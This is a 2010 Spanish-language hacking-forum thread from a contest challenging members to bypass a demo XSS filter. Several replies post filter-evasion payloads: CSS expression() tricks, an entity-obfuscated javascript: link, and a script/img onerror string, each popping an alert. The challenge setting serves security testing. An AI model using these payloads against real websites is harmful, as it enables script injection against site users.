[CYH] Bypass de filtros de XSS :)

Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

22 Noviembre 2024, 08:37 am

Tema destacado: Estamos en la red social de Mastodon

Foro de elhacker.net

Seguridad Informática

Hacking

Bugs y Exploits

Nivel Web (Moderadores: sirdarckcat, WHK)

[CYH] Bypass de filtros de XSS :)

0 Usuarios y 1 Visitante están viendo este tema.

Páginas: [1] 2 3

Ir Abajo

Respuesta

Imprimir

Autor

Tema: [CYH] Bypass de filtros de XSS :) (Leído 15,933 veces)

sirdarckcat

Aspirante a supervillano
Moderador

Desconectado

Desconectado

Mensajes: 7.029

No estoy loco, soy mentalmente divergente

Ver Perfil

WWW

[CYH] Bypass de filtros de XSS :)

« en: 8 Abril 2010, 08:47 am »

Can You Hack?
Semi-allowhtml

CYH es un evento donde todos los usuarios del foro pueden participar y ganar premios y realizar todo tipo de retos

Hola!

Los invito a h4x0r3ar este filtro de XSS:
http://allowhtml.com/demo/

Yo lo bypasee hace rato xD

Código:

<div style="xss=\000065xpression(confirm(1))!: url('xD');">hola</div>

Asi que no esta muy dificil!

Los 2 que encuentren mas bypasses antes del 8 de mayo, se ganan cuentas @elhacker.net

Saludos!!


« Última modificación: 13 Abril 2010, 01:39 am por WHK »	En línea

- WarZone.elhacker.net
- twitter de elhacker.net
- wiki de elhacker.net

tragantras

Desconectado

Desconectado

Mensajes: 465

Ver Perfil

Re: Bypass de filtros de XSS :)

« Respuesta #1 en: 8 Abril 2010, 13:50 pm »

alguien que sea generoso puede explicar la cadena que ha puesto sidarckcat

en concreto... el campo style de la etiqueta div

gracias y un saludo :3


	En línea

Colaboraciones:
1 2

jdc

Desconectado

Desconectado

Mensajes: 3.406

Ver Perfil

WWW

Re: Bypass de filtros de XSS :)

« Respuesta #2 en: 8 Abril 2010, 17:38 pm »

Es parte de la celebración de abril negro?

No había puesto WHK el filtro de otra página?


	En línea

sirdarckcat

Aspirante a supervillano
Moderador

Desconectado

Desconectado

Mensajes: 7.029

No estoy loco, soy mentalmente divergente

Ver Perfil

WWW

Re: Bypass de filtros de XSS :)

« Respuesta #3 en: 8 Abril 2010, 22:11 pm »

el de WHK es PHPIDS
ese es otro

y no tiene nada que ver con abril negro xD


	En línea

- WarZone.elhacker.net
- twitter de elhacker.net
- wiki de elhacker.net

jdc

Desconectado

Desconectado

Mensajes: 3.406

Ver Perfil

WWW

Re: Bypass de filtros de XSS :)

« Respuesta #4 en: 8 Abril 2010, 22:15 pm »

ya no encontre nada y me dolio la cabeza, es muy extraño tu xss ¬¬ no lo entiendo o ya esta solucionado?

Código:

<img widht="2000" height="2000" src="http://foro.elhacker.net/Smileys/chef/carita.gif" alt="juas" />

jajajajaja


« Última modificación: 8 Abril 2010, 22:21 pm por janito24 »	En línea

Shell Root

Moderador Global

Desconectado

Desconectado

Mensajes: 3.724

<3

Ver Perfil

WWW

Re: Bypass de filtros de XSS :)

« Respuesta #5 en: 8 Abril 2010, 22:23 pm »

Raro, porque?, Creo que es CSS Injection

, Además si mal no recuerdo, expression es solo para IE! :silbar:

:silbar:

Código

<XSS STYLE="xss:expression(alert('XSS'))">...


« Última modificación: 8 Abril 2010, 22:27 pm por Alex@ShellRoot »	En línea

Te vendería mi talento por poder dormir tranquilo.

yasión

Desconectado

Desconectado

Mensajes: 48

‮‮

Ver Perfil

WWW

Re: Bypass de filtros de XSS :)

« Respuesta #6 en: 8 Abril 2010, 23:07 pm »

Esto hace cosas raras:

Código

<a href="></a>

Es lo primero que he probado, luego lo miro un poco más.


	En línea

‭

SeC

Desconectado

Desconectado

Mensajes: 109

@susan.

Ver Perfil

WWW

Re: Bypass de filtros de XSS :)

« Respuesta #7 en: 10 Abril 2010, 03:36 am »

Ya he probado de mil maneras =/ , esto se ve lindo, pero nada jeje, ta bueno el filtro =P

Código

<a href="javascr&#38;#x0Aipt:a&#38;#x0Alert(1);" target="_blank">asd</a>


	En línea

Educad a los niños y no sera necesario castigar a los hombres - Pitagoras.

cgvwzq

Desconectado

Desconectado

Mensajes: 57

Agente P.

Ver Perfil

WWW

Re: [CYH] Bypass de filtros de XSS :)

« Respuesta #8 en: 14 Abril 2010, 20:36 pm »

Quiero una cuenta... =P

Código:

<script>><img src=x onerror=alert(/cuack/) tr=


	En línea

Some stuff:

www.a] parsed as ]www.a]
Bypass elhacker's img filter with ALT attribute!
¿Para cuándo SQLi I y II? WZ

Shell Root

Moderador Global

Desconectado

Desconectado

Mensajes: 3.724

<3

Ver Perfil

WWW

Re: [CYH] Bypass de filtros de XSS :)

« Respuesta #9 en: 14 Abril 2010, 20:41 pm »

jejejejeje ;-)

;-)


	En línea

Te vendería mi talento por poder dormir tranquilo.

Páginas: [1] 2 3

Ir Arriba

Respuesta

Imprimir

Ir a:

Mensajes similares
		Asunto	Iniciado por	Respuestas	Vistas	Último mensaje
		bypass Juegos y Consolas	gordy(D!@bL0)	2	2,949	28 Abril 2006, 20:19 pm por gordy(D!@bL0)
		Bypass + iSQL Nivel Web	Shell Root	5	4,326	1 Junio 2011, 21:01 pm por .mokk.
		Bypass getimagesize() Pregunta. Nivel Web	dRak0	0	3,687	27 Noviembre 2013, 02:43 am por dRak0
		Esto es un ByPass? Dudas Generales	boy-ka	2	2,356	30 Julio 2015, 19:50 pm por boy-ka
		Bypass Hacking	Izaya	6	5,515	23 Marzo 2016, 21:28 pm por MCKSys Argentina

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines